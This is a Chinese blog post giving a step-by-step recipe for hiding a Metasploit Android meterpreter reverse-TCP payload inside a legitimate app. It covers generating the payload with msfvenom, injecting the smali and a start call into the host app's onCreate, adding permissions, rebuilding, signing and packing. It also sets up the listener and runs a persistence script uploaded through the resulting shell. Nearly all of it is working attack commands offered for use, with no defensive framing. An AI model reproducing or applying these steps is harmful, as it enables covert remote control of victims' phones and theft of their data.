Android payload注入
参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload: invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译 //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名 //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳 //百度"加壳工具"
10,service postgresql start //启动数据库
11,msfconsole //启动msf
12,use exploit/multi/handler //加载攻击模块
13,set payload android/meterpreter/reverse_tcp //选择要使用的Payload
14,show options //查看需要设置的参数
15,exploit //执行
16,持续监听编写一个sh脚本,保存桌面并赋权限
#! /bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN(action标签) -n com.metasploit.stage/.MainActivity
sleep 20
done
meterpreter > pwd //找到当前路径
meterpreter > upload /root/桌面/chixu.sh //上传脚本
meterpreter > shell //输入shell
pwd
/
cd /data/user/0/com.baidu.flashlight/files //找到脚本所在文件夹
ls
chixu.sh
sh chixu.sh //运行脚本
msf支持上线自动执行命令,设置InitialAutoRunScript或autorunscript可以让你上线的session自动上传并执行脚本
Android payload注入相关推荐
- Android 依赖注入: Dagger 2 实例解说(一)
本文原创,转载请注明出处:http://blog.csdn.net/zjbpku [Duplicated] link to Dagger on Android - Dagger2具体解释 关于D ...
- 【Android 逆向】Android 进程注入工具开发 ( 总结 | 源码编译 | 逆向环境搭建使用 | 使用进程注入工具进行逆向操作 ) ★★★
文章目录 一.Android 进程注入工具开发系列博客 二.Android 进程注入工具 源码下载编译 三.逆向环境搭建 四.使用注入工具进行逆向操作 1.获取远程进程号 2.注入工具准备 3.注入动 ...
- 【Android 逆向】Android 进程注入工具开发 ( 远程调用 | x86 架构的返回值获取 | arm 架构远程调用 )
文章目录 前言 一.x86 架构的返回值获取 二.ARM 架构远程调用 前言 在之前的博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 获取 远程 目标进程 中的 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 注入工具收尾操作 | 关闭注入的动态库 | 恢复寄存器 | 脱离远程调试附着 )
文章目录 一.dlclose 函数简介 二.关闭注入的 libbridge.so 动态库 三.恢复寄存器 四.脱离远程调试附着 一.dlclose 函数简介 dlclose 函数的作用是 卸载一个 指 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取注入的 libbridge.so 动态库中的 load 函数地址 并 通过 远程调用 执行该函数 )
文章目录 一.dlsym 函数简介 二.获取 目标进程 linker 中的 dlsym 函数地址 三.远程调用 目标进程 linker 中的 dlsym 函数 获取 注入的 libbridge.so ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 获取 linker 中的 dlopen 函数地址 并 通过 远程调用 执行该函数 )
文章目录 一.dlopen 函数简介 二.获取 目标进程 linker 中的 dlopen 函数地址 三.远程调用 目标进程 linker 中的 dlopen 函数 一.dlopen 函数简介 dlo ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 三 | 等待远程函数执行完毕 | 寄存器获取返回值 )
文章目录 前言 一.等待远程进程 mmap 函数执行完毕 二.从寄存器中获取进程返回值 三.博客资源 前言 前置博客 : [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 远程调用 目标进程中 libc.so 动态库中的 mmap 函数 二 | 准备参数 | 远程调用 mmap 函数 )
文章目录 一.准备 mmap 函数的参数 二.mmap 函数远程调用 一.准备 mmap 函数的参数 上一篇博客 [Android 逆向]Android 进程注入工具开发 ( 注入代码分析 | 远程调 ...
- 【Android 逆向】Android 进程注入工具开发 ( 注入代码分析 | 调试进程 ATTACH 附着目标进程 | 读取目标函数寄存器值并存档 )
文章目录 一.调试进程 ATTACH 附着目标进程 二.读取目标函数寄存器值并存档 1.主要操作流程 2.ptrace 函数 PTRACE_GETREGS 读取寄存器值 一.调试进程 ATTACH 附 ...
最新文章
- JAVA常见算法题(十三)
- TP的中间件:过滤处理HTTP的请求与响应
- Linux JDK升级
- Spring系列(七):@FactoryBean注解用法介绍
- java 中以||作为split分隔符正确的写法
- c mysql 双主复制_mysql双主复制及使用keepalived作高可用的配置详解
- linux内核那些事之pg_data_t、zone结构初始化
- mysq show 指令
- oracle 主键_mysql 组合索引带主键ID的问题
- 使用实例 ---- 使用NUnit在.Net编程中进行单元测试
- 论文 | 研究方法 —— 结构方程
- 冒泡排序 C语言(从大到小排序)
- 彻底删除mysql server 2005_sql2005卸载工具(sql server 2005卸载工具)
- 灰鸽子病毒——网络神偷之后应用最广的反弹端口***
- MSVC创建的Qt工程图标设置
- python自动qq群发_自动给qq好友发消息
- hbuilderAnd海马玩模拟器的连接
- python:初识自动化测试 playwright 库
- 花了一些力气研究aircv,搞一个后台找图识图的DEMO
- php寻仙记,wap寻仙记